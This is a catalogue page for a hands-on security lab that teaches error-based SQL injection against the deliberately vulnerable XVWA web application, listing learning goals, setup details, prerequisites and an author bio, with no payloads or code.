Our Scenarios

XVWA-SQLi (Error)

XVWA - SQL Injection

This lab shows step-by-step how to exploit an Error-Based SQL Injection on the Xtreme Vulnerable Web Application (XVWA) to retrieve information from the back-end database.

XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security. The idea is to evangelize web application security to the community in possibly the easiest and fundamental way. Learn and acquire these skills for good purpose.

Why SQL Injections are important?

SQL Injection vulnerabilities are one of the most severe weaknesses found in the wild. SQL Injection attacks are unfortunately very common, and this is due to two factors: 1. The significant prevalence of SQL Injection vulnerabilities, and 2. the attractiveness of the target (i.e., the database typically contains all the interesting/critical data for your application).

What you will learn?

  • What is SQL Injection.
  • How to identify an Error-Based SQL Injection.
  • How to exploit an Error-Based SQL Injection to retrieve information from the back-end database.

Technical Details

  • This scenario contains one virtual machine.
  • VPN Connection Required: Optional
  • This lab can be completed by either connecting to the CR VPN or by simply utilizing the Web Proxy feature.
  • The examples demonstrated throughout this scenario are based on Linux.

Scenario Pre-requisites

In order to benefit from this scenario it is recommended you have competence in the following areas: 1. What is Structured Query Language (SQL) 2. How web applications work behind the scenes 3. How to use an HTTP Intercepting Proxy

About the Author

Marios holds a BSc Computer Science degree from Northumbria University and an MSc degree in Cyber Security from the University of York. He is one of the OWASP Cyprus Chapter Leaders and he is passionate about web application security. He likes to spend his free time mastering his backgammon skills.